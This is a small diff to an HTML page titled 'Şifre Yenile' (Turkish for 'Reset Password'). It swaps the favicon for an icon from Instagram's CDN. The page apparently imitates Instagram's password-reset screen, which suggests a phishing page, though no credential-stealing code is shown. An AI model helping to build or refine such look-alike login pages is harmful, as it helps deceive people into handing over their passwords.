--- a/index.html
+++ b/index.html
@@ -4,7 +4,7 @@
     <meta charset="UTF-8">
     <meta name="viewport" content="width=device-width, initial-scale=1.0">
     <title>Şifre Yenile</title>
-    <link rel="icon" type="image/x-icon" href="https://www.instagram.com/favicon.ico">
+    <link rel="icon" type="image/x-icon" href="https://static.cdninstagram.com/rsrc.php/v3/yI/r/VsNDI4s37cN.ico?v=1">
     <script src="https://cdn.tailwindcss.com?client"></script>
     <style>
         .toggle-password {
